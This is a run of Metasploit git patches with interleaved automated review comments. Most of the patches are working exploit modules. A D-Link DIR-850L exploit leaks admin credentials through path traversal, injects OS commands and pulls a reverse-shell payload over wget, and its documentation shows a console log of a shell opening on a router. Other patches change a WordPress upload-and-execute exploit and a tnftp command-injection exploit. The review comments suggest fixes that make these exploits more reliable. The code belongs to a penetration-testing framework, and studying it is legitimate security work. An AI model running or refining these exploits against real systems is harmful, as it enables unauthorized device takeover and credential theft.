+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule + CachedSize = 854692 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb index 345737bb79..01adfad676 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule + CachedSize = 854692 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb index 2de9507578..8f13d5b934 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux' module MetasploitModule + CachedSize = 854692 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig From 3847a6849473c9b60d6d4410d6cdd69526027ed9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 13:23:32 -0500 Subject: [PATCH 079/254] Clean up module --- .../wp_mobile_detector_upload_execute.rb | 23 +++++-------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb index 1817767973..c5f6f7adcd 100644 --- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb 
+++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -6,9 +6,9 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( @@ -50,9 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - if datastore['SRVHOST'] == '0.0.0.0' - fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from rhost') - end payload_name = rand_text_alphanumeric(10) + '.php' # First check to see if the file is written already, if it is cache wont retrieve it from us @@ -69,29 +66,22 @@ class MetasploitModule < Msf::Exploit::Remote def on_request_uri(cli, _request) print_good('Payload requested on server, sending') - send_response(cli, payload.encoded, {}) + send_response(cli, payload.encoded) end print_status('Starting Payload Server') - payload_url = '/' + payload_name - start_service('Uri' => { - 'Path' => payload_url, - 'Proc' => proc do |cli, req| - on_request_uri(cli, req) - end - }) + start_service('Path' => "/#{payload_name}") - payload_full_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + payload_url - print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{payload_full_url}") + print_status("Uploading payload via #{normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')}?src=#{get_uri}") res = send_request_cgi( 'global' => true, 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php'), - 'vars_get' => {'src' => payload_full_url} + 'vars_get' => {'src' => get_uri} ) - if res && res.code == 200 + if res && res.code == 200 print_good('Sleeping 5 seconds for payload upload') register_files_for_cleanup(payload_name) 
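Review bot: The resize.php URI and `get_uri` are each evaluated twice in the new code, once in the `print_status` line and again in the `send_request_cgi` call; assigning `resize_uri = normalize_uri(wordpress_url_plugins, 'wp-mobile-detector', 'resize.php')` and `payload_url = get_uri` before the print keeps the logged value and the requested value guaranteed identical. The removed `SRVHOST == '0.0.0.0'` guard is presumably covered by `get_uri` resolving a reachable address, but that is not visible here and is worth confirming, since a literal 0.0.0.0 in the `src` parameter would make the upload silently fail. The `exploit` method this hunk modifies begins outside the hunk.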
@@ -104,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote }) # wait for callback, without this we exit too fast and miss our shell Rex.sleep(2) - handler else if res.nil? fail_with(Failure::Unreachable, 'No response from the target') From 7a09dcb4085231bd84d033d1978943267f69ffcd Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 13:32:00 -0500 Subject: [PATCH 080/254] Fix #9109, HttpServer (TcpServer) backgrounding --- .../exploits/unix/webapp/wp_mobile_detector_upload_execute.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb index c5f6f7adcd..3355a7c067 100644 --- a/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb @@ -41,7 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wp-mobile-detectory < 3.6', {}]], - 'DefaultTarget' => 0 + 'DefaultTarget' => 0, + 'Stance' => Msf::Exploit::Stance::Aggressive )) end From 0e66ca1dc06f576d7e8bee03429b57159cab46b0 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 15:05:49 -0500 Subject: [PATCH 081/254] Fix #3444/#4774, get_json_document over JSON.parse Forgot to update these when I wrote new modules. --- modules/auxiliary/scanner/http/chromecast_webserver.rb | 7 +------ modules/auxiliary/scanner/http/chromecast_wifi.rb | 2 +- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index c62019c8c5..82b9f1233e 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb 
@@ -37,12 +37,7 @@ class MetasploitModule < Msf::Auxiliary return unless (res && res.code == 200) - begin - json = JSON.parse(res.body) - rescue JSON::ParserError - return - end - + json = res.get_json_document name, ssid = json['name'], json['ssid'] if name && ssid diff --git a/modules/auxiliary/scanner/http/chromecast_wifi.rb b/modules/auxiliary/scanner/http/chromecast_wifi.rb index 63bd531a60..c68cfea3b1 100644 --- a/modules/auxiliary/scanner/http/chromecast_wifi.rb +++ b/modules/auxiliary/scanner/http/chromecast_wifi.rb @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary 'SortIndex' => -1 ) - JSON.parse(res.body).each do |wap| + res.get_json_document.each do |wap| waps_table << [ wap['bssid'], wap['signal_level'], From 77181bcc9c3b1c71bbed3761bbd10ea0c9d2c17b Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 15:32:32 -0500 Subject: [PATCH 082/254] Prefer peer over rhost/rport --- modules/auxiliary/scanner/http/jenkins_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 982adf452e..2eaa0a1ac9 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary end version = res.headers['X-Jenkins'] - print_good("#{rhost}:#{rport} Jenkins Version - #{version}") + print_good("#{peer} - Jenkins Version #{version}") report_service( :host => rhost, :port => rport, From 87934b81944be45433b1a588e2f8861bd38648c7 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 1 Nov 2017 17:37:41 -0500 Subject: [PATCH 083/254] Convert tnftp_savefile from auxiliary to exploit This has been a long time coming. Fixes #4109. --- .../unix/http}/tnftp_savefile.rb | 30 +++++++++---------- 1 file changed, 14 insertions(+), 16 deletions(-) rename modules/{auxiliary/server => exploits/unix/http}/tnftp_savefile.rb (84%) 
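Review bot: The replaced `begin/rescue JSON::ParserError ... return` made the parse-failure path explicit, while the behaviour of `json = res.get_json_document` on a non-JSON body depends on what that helper returns, which is not visible in this hunk. If it yields an empty hash, `json['name']` is nil and the `if name && ssid` guard still holds; if it can yield nil, that line raises NoMethodError. A `return if json.nil? || json.empty?` after the assignment records the intent either way; the same consideration applies to the `res.get_json_document.each` call in the chromecast_wifi hunk.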
diff --git a/modules/auxiliary/server/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb similarity index 84% rename from modules/auxiliary/server/tnftp_savefile.rb rename to modules/exploits/unix/http/tnftp_savefile.rb index bcce71a02b..d1b7172ec9 100644 --- a/modules/auxiliary/server/tnftp_savefile.rb +++ b/modules/exploits/unix/http/tnftp_savefile.rb @@ -3,7 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class MetasploitModule < Msf::Auxiliary +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpServer include Msf::Auxiliary::Report @@ -32,22 +34,18 @@ class MetasploitModule < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 28 2014', 'License' => MSF_LICENSE, - 'Actions' => [ - ['Service'] - ], - 'PassiveActions' => [ - 'Service' - ], - 'DefaultAction' => 'Service' + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => {'BadChars' => '/'}, + 'Targets' => [['ftp(1)', {}]], + 'DefaultTarget' => 0 )) - - register_options([ - OptString.new('CMD', [true, 'Command to run', 'uname -a']) - ]) end - def run - exploit + def exploit + start_service + sleep end def on_request_uri(cli, request) @@ -59,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary if request.uri.ends_with?(sploit) send_response(cli, '') - print_good("Executing `#{datastore['CMD']}'!") + print_good("Executing `#{payload.encoded}'!") report_vuln( :host => cli.peerhost, :name => self.name, @@ -79,6 +77,6 @@ class MetasploitModule < Msf::Auxiliary end def sploit - "|#{datastore['CMD']}" + "|#{payload.encoded}" end end From a15b61a21834fb77ed4918ff43bce895409e967b Mon Sep 17 00:00:00 2001 
From: William Vu Date: Wed, 1 Nov 2017 19:22:11 -0500 Subject: [PATCH 084/254] Fix #9160, exploit method from TcpServer It already starts the server and waits for us. This is what was called when the module was still auxiliary. --- modules/exploits/unix/http/tnftp_savefile.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/exploits/unix/http/tnftp_savefile.rb b/modules/exploits/unix/http/tnftp_savefile.rb index d1b7172ec9..57e9961e94 100644 --- a/modules/exploits/unix/http/tnftp_savefile.rb +++ b/modules/exploits/unix/http/tnftp_savefile.rb @@ -43,11 +43,6 @@ class MetasploitModule < Msf::Exploit::Remote )) end - def exploit - start_service - sleep - end - def on_request_uri(cli, request) unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/ print_status("#{request['User-Agent']} connected") From d815e42ccfb2b5b42d3358de89879eeb3f8b0955 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 1 Nov 2017 20:38:45 -0400 Subject: [PATCH 085/254] Add a generic tab completion function --- .../ui/console/command_dispatcher/payload.rb | 37 ++++++++++++++----- 1 file changed, 27 insertions(+), 10 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index bab4065d70..20b223f266 100644 --- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb 
@@ -153,22 +153,39 @@ module Msf end def cmd_generate_tabs(str, words) + fmt = { + '-b' => [ true ], + '-E' => [ nil, ], + '-e' => [ framework.encoders.map { |refname, mod| refname } ], + '-h' => [ nil, ], + '-o' => [ true, ], + '-s' => [ true, ], + '-f' => [ :file, ], + '-t' => [ @@supported_formats, ], + '-p' => [ true, ], + '-k' => [ nil, ], + '-x' => [ :file, ], + '-i' => [ true, ] + } + tab_complete_spec(fmt, str, words) + end + + def tab_complete_spec(fmt, str, words) last_word = words[-1] - fmt = @@generate_opts.fmt fmt = fmt.select { |key, value| last_word == key || !words.include?(key) } - option = fmt[last_word] - return fmt.keys if !option || !option[0] + val = fmt[last_word] + return fmt.keys if !val # the last word does not look like a fmtspec + arg = val[0] + return fmt.keys if !arg # the last word is a fmtspec that takes no argument tabs = [] - case last_word - when '-e' - tabs = framework.encoders.map { |refname, mod| refname } - when '-f' - tabs = tab_complete_filenames(str, words) - when '-t' - tabs = @@supported_formats + if arg.to_s.to_sym == :file + tabs = tab_complete_filenames(str, words) + elsif arg.kind_of?(Array) + tabs = arg.map {|a| a.to_s} end + tabs end end end From 70033e2b94642a66e50bd04bed84750a9403fcdb Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 2 Nov 2017 12:31:54 -0400 Subject: [PATCH 086/254] Enable the payload handler by default --- modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb | 4 ++-- modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb | 1 - 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index a91c80694e..9651e72307 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb 
@@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'process' + 'EXITFUNC' => 'process', + 'DisablePayloadHandler' => true }, 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => @@ -76,7 +77,6 @@ class MetasploitModule < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb index bfc4fc71ba..312d43b18b 100644 --- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb @@ -79,7 +79,6 @@ class MetasploitModule < Msf::Exploit::Local register_advanced_options( [ - OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]), OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) ] From a14102083ca7871e03c1be709289ff1d8f785fa1 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 2 Nov 2017 10:01:12 -0700 Subject: [PATCH 087/254] Bump version of framework to 4.16.15 --- Gemfile.lock | 14 +++++++------- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 5a57421014..4d5a45de98 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.14) + metasploit-framework (4.16.15) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) 
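Review bot: In the cve_2017_8464_lnk_rce hunk, the advanced `OptBool` that defaulted `DisablePayloadHandler` to true is replaced by a `DefaultOptions` entry that also sets it to true, so for this module the handler appears to stay disabled by default despite the commit subject; only the lnk_lpe hunk, which drops the option without a replacement, changes the effective default (assuming the framework-level option defaults to false). If keeping the handler off for the file-format module is deliberate, a comment beside the entry, such as `# handler stays off by default for this file-format module; start one separately`, would record that for the next reader.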
@@ -130,25 +130,25 @@ GEM google-protobuf (3.4.1.1) googleapis-common-protos-types (1.0.0) google-protobuf (~> 3.0) - googleauth (0.5.3) + googleauth (0.6.1) faraday (~> 0.12) - jwt (~> 1.4) + jwt (>= 1.4, < 3.0) logging (~> 2.0) memoist (~> 0.12) multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.7.0) + grpc (1.7.2) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) - googleauth (~> 0.5.1) + googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) i18n (0.9.0) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix json (2.1.0) - jwt (1.5.6) + jwt (2.1.0) little-plugger (1.1.4) logging (2.2.2) little-plugger (~> 1.1) @@ -378,4 +378,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.4 + 1.16.0 diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 9690195ec5..88b837dc2f 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.16.14" + VERSION = "4.16.15" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 61a67efb826f02815341dc9825f74ee852509852 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:53:09 -0400 Subject: [PATCH 088/254] annnd....it sucks --- .../linux/http/dlink_850l_unauth_exec.rb | 165 ++++++++++++++++++ 1 file changed, 165 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_850l_unauth_exec.rb diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb new file mode 100644 index 0000000000..181cbb1784 --- /dev/null +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb 
@@ -0,0 +1,165 @@ +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', + 'Description' => %q{ + This module leverages an unauthenticated credential disclosure + vulneralbility to then execute arbitrary commands on DIR-850L routers + as an authenticated user. Unable to use Meterpreter payloads, or + any other payload besides linux/mipsbe/shell/reverse_tcp & occasionally + linux/mipsbe/shell_reverse_tcp. + }, + 'Author' => [ + 'Mumbai ' # module + ], + 'References' => [ + ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], + ], + 'DisclosureDate' => 'Aug 9 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' + }, + 'Privileged' => true, + 'Payload' => { + 'DisableNops' => true, + }, + 'Targets' => [[ 'Automatic', {} ]], + )) + end + + def retrieve_creds + begin + xml = "\r\n" + xml << "\r\n" + xml << "\r\n" + xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" + xml << "\r\n" + xml << "" + uid = rand_text_alpha_lower(8) + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'encode_params' => false, + 'headers' => { + 'Accept-Encoding' => 'gzip, deflate', + 'Accept' => '*/*' + }, + 'ctype' => 'text/xml', + 'cookie' => "uid=#{uid}", + 'data' => xml, + }) + parse = res.get_xml_document + username = parse.at('//name').text + password = parse.at('//password').text + return username, password + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def retrieve_uid + begin + res = send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'GET', + 
}) + parse = res.get_json_document + uid = parse['uid'] + challenge = parse['challenge'] + return uid, challenge + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def hash_passwd(username, password, challenge) + hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase + return hash + end + + def login(username, hash, uid) + begin + data = "id=#{username}&password=#{hash}" + res = send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'POST', + 'data' => data, + 'cookie' => "uid=#{uid}" + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def execute_command(cmd, opts) + username, password = retrieve_creds + uid, challenge = retrieve_uid + hash = hash_passwd(username, password, challenge) + login(username, hash, uid) + payload = "\r\n" + payload << "\r\n" + payload << "\r\n" + payload << " DEVICE.TIME\r\n" + payload << " \r\n" + payload << " \r\n" + payload << "\r\n" + payload << "" + begin + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'ctype' => 'text/xml', + 'data' => payload, + 'cookie' => "uid=#{uid}" + }) + res = send_request_cgi({ + 'uri' => '/pigwidgeon.cgi', + 'method' => 'POST', + 'data' => 'ACTIONS=SETCFG,ACTIVATE', + 'cookie' => "uid=#{uid}" + }) + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + + def exploit + print_status("#{peer} - Initiating exploitation...") + execute_cmdstager( + :flavor => :wget, + :background => true, + :nodelete => true + ) + end +end From 429ac71a63e438687278cd0259c63d0dfd812c49 Mon Sep 17 00:00:00 2001 
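Review bot: `retrieve_creds` and `retrieve_uid` call `res.get_xml_document` / `res.get_json_document` and then `parse.at('//name').text` without first checking that `send_request_cgi` returned anything; a timeout yields `nil` and the module dies with a `NoMethodError` rather than a clean failure, because only `::Rex::ConnectionError` is rescued. Add `fail_with(Failure::UnexpectedReply, "#{peer} - No response from hedwig.cgi") unless res && res.code == 200` after each request and guard the `at('//name')` / `at('//password')` lookups before calling `.text` on them. The connection-error rescues throughout the file would read better as `Failure::Unreachable` than `Failure::Unknown`. `execute_command` also takes an `opts` parameter it never reads and assigns `res` twice without looking at either response.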
From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:53:45 -0400 Subject: [PATCH 089/254] header --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 181cbb1784..0efbe59d9c 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'openssl' class MetasploitModule < Msf::Exploit::Remote From caad1bbf271f27cbd22334bb2cc5e1288bc4d6a0 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:54:45 -0400 Subject: [PATCH 090/254] Create dlink_dir850l_unauth_exec.md --- .../linux/http/dlink_dir850l_unauth_exec.md | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md new file mode 100644 index 0000000000..dc8863c9d1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md 
@@ -0,0 +1,40 @@ +The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection +vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 +are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop. + +## Vulnerable Application + + + 1. Start msfconsole + 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` + 3. Do : `set RHOST [RouterIP]` + 4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp` + 5. Do : `run` + 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session + + +## Example + +``` +msf > use exploit/linux/http/dlink_850l_unauth_exec +msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 +RHOST => 192.168.0.14 +msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 +RPORT => 80 +msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3 +LHOST => ens3 +msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 +LPORT => 1351 +msf exploit(dlink_850l_unauthenticated_exec) > run + +[*] Started reverse TCP handler on 192.168.0.11:1351 +[*] 192.168.0.14:80 - Initiating exploitation... +[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl +[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl +[*] 192.168.0.14:80 - Retrieving uid and auth challenge... +[*] Command Stager progress - 100.00% done (101/101 bytes) +[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl +[*] Sending payload to 192.168.0.14 (Wget) +[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400 +[*] Server stopped. +``` From 5b7d803f85c5e872bd0fddb7894aed91e2d4e990 Mon Sep 17 00:00:00 2001 
From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:57:03 -0400 Subject: [PATCH 091/254] Update dlink_850l_unauth_exec.rb --- modules/exploits/linux/http/dlink_850l_unauth_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 0efbe59d9c..8f05f151f1 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -6,7 +6,7 @@ require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = AverageRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From af583e843c5e464e5cc29ec507ce9335a06d0a16 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Fri, 3 Nov 2017 06:21:59 -0400 Subject: [PATCH 092/254] Update dlink_850l_unauth_exec.rb --- .../linux/http/dlink_850l_unauth_exec.rb | 40 +++++++------------ 1 file changed, 15 insertions(+), 25 deletions(-) diff --git a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb index 8f05f151f1..70e1f8e5db 100644 --- a/modules/exploits/linux/http/dlink_850l_unauth_exec.rb +++ b/modules/exploits/linux/http/dlink_850l_unauth_exec.rb @@ -1,12 +1,7 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - require 'openssl' class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager 
@@ -49,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote xml = "\r\n" xml << "\r\n" xml << "\r\n" - xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" + xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" xml << "\r\n" xml << "" uid = rand_text_alpha_lower(8) @@ -68,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text + vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}") return username, password rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") @@ -89,31 +85,25 @@ class MetasploitModule < Msf::Exploit::Remote end end - def hash_passwd(username, password, challenge) - hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase - return hash - end - - def login(username, hash, uid) + def login + username, password = retrieve_creds + uid, challenge = retrieve_uid begin - data = "id=#{username}&password=#{hash}" + hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase res = send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', - 'data' => data, + 'data' => "id=#{username}&password=#{hash}", 'cookie' => "uid=#{uid}" }) - return res + return uid rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def execute_command(cmd, opts) - username, password = retrieve_creds - uid, challenge = retrieve_uid - hash = hash_passwd(username, password, challenge) - login(username, hash, uid) + uid = login payload = "\r\n" payload << "\r\n" payload << "\r\n" 
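Review bot: In the new `login`, the `/authentication.cgi` response is assigned to `res` but never examined, so `login` returns `uid` even when the device rejected the credentials and `execute_command` goes on to post the configuration with an unauthenticated session id. Check the response before returning, e.g. `fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 200` (the device's own success indicator, if the body carries one, would be a stronger test). The new payload line uses `Rex::Text.rand_text_alpha_lower(8)` while the rest of the file calls the mixin's `rand_text_alpha_lower(8)` unqualified; pick one form. The added `vprint_status` echoes the recovered password in cleartext to the console, which is fine under VERBOSE but worth a comment so it is not promoted to `print_status` later.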
